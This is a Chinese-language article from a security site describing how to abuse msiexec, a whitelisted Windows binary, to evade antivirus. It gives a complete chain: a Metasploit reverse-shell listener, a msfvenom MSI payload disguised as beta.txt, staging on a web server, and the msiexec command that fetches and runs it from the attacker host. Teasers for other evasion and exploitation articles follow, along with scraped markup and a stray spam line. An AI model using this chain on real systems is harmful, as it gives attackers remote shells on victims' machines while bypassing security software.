<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    白名單Msiexec執行payload方式!

    VSole2023-02-13 10:57:30

    msiexec是非常重要的操作系統組件,通常用來安裝Windows Installer安裝包,而且msiexec支持遠程加載msi程序功能,因此可以通過msiexec加載遠程的惡意msi程序,實現免殺的效果。其它的白名單執行payload包括:Wmic、Mshta.exe、 Regsvr32、Regsvcs、Regasm、 Rundll32、PsExec、 Cmstp.exe等。

    MSF監聽設置

    >> use exploit/multi/handler>> set lhost 192.168.146.130>> set lport 9998>> set payload windows/x64/shell/reverse_tcp>> exploit -j

         

    msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.146.130  LPORT=9998 -f msi > beta.txt

    開啟web服務,將beta.txt移動到web服務的根目錄

    >> sudo service apache2 start>> sudo mv beta.txt /var/www/html/

     msiexecXEC執行Payload

    C:\Windows\System32\msiexec.exe /q /i http://192.168.146.130/beta.txt

    payload白名單
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    白名單Msiexec執行payload方式!
    2023-02-13 10:57:30
    msiexec是非常重要的操作系統組件,通常用來安裝Windows Installer安裝包,而且msiexec支持遠程加載msi程序功能,因此可以通過msiexec加載遠程的惡意msi程序,實現免殺的效果。
    MSF+生成流量免殺木馬
    2022-01-14 11:34:16
    在實戰中,即便你繞過了殺毒軟件的檢測,也很有可能會結束在某些流量監控的設備上。MSF可以說其是每一個內網玩家的必用工具。理所當然,這款工具也自然而然地被各大安全廠商分析,捕捉其在命令執行時產生的數據和流量。當我們使用一個沒有做過加密處理的原版工具時,內網中的安全設備會根據我們的流量特征進行判斷,認定我們為惡意進程,從而導致控制中斷。Meterpreter技巧生成后門msfvenom?
    sqlps.exe白名單的利用
    2022-03-24 17:02:03
    0x01 sqlps.exe簡介 sqlps.exe是SQL Server附帶的一個具有Microsoft簽名的二進制文件,用于加載SQL Server cmdlet,Microsoft Visual C#開發,可用ILSpy反編譯查看源代碼。 Microsoft SQL Server\100和110是Powershell v2,120和130是Powershell v4。2016中已由SQL
    sqlps.exe白名單的利用(過S60!)
    2022-05-23 08:07:11
    0x01 sqlps.exe簡介sqlps.exe是SQL Server附帶的一個具有Microsoft簽名的二進制文件,用于加載SQL Server cmdlet,Microsoft Visual C#開發,可用ILSpy反編譯查看源代碼。
    域滲透 | SMB的原理與外部C2的應用
    2022-06-27 11:03:57
    SMB Beacon 與命名管道在 Windows 中,無管理員權限的情況下,即無法添加白名單。定義特定版本的協議的消息數據包集稱為方言。進行身份驗證后,用戶可以訪問服務器上不受共享級別安全性保護的所有共享。
    PHP環境繞過360執行馬兒上線
    2022-03-11 16:50:15
    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。0x01 前言前幾天群里有個老哥私聊我問了個問題,phpStudy搭建的Web環境,
    fastjson 漏洞的發現與測試
    2022-01-05 20:00:05
    Fastjson 是阿里巴巴公司開源的一款 json 解析器,其性能優越,被廣泛應用于各大廠商的 Java 項目中。fastjson 于 1.2.24 版本后增加了反序列化白名單,而在 1.2.48 以前的版本中,攻擊者可以利用特殊構造的 json 字符串繞過白名單檢測,成功執行任意命令。
    Fastjson 漏洞的發現與測試
    2021-12-03 15:40:17
    Fastjson 是阿里巴巴公司開源的一款 json 解析器,其性能優越,被廣泛應用于各大廠商的 Java 項目中。fastjson 于 1.2.24 版本后增加了反序列化白名單,而在 1.2.48 以前的版本中,攻擊者可以利用特殊構造的 json 字符串繞過白名單檢測,成功執行任意命令。
    繞過不能執行大部分系統命令和微軟殺毒
    2021-10-14 08:45:11
    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。公司項目,全程打碼,已經拿下webshell,提權。無意中發現,php禁止的其實都屬于php函數,但是asp和aspx跟php是不同的。傳asp、 aspx大馬訪問都是500,傳了一個asp的冰蝎。
    autoSSRF:一款基于上下文的智能SSRF漏洞掃描工具
    2022-11-21 10:59:41
    autoSSRF是一款功能強大的智能化SSRF漏洞掃描工具,該工具基于上下文識別漏洞,并且適用于大規模掃描任務。GET參數進行智能化模糊測試在進行模糊測試時,autoSSRF只會針對跟SSRF相關的常見參數進行測試,并且不會干擾其他功能。fileURL=https://authorizedhost.com),autoSSRF將會把authorizedhost.com識別為一個Web應用程序中的潛在白名單主機,并基于已知信息動態生成Payload,然后嘗試繞過白名單驗證。除此之外,該工具還會確保幾乎零誤報。該工具的檢測功能依賴于interactsh項目,因此autoSSRF能夠識別出站DNS/HTTP交互信息。?
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类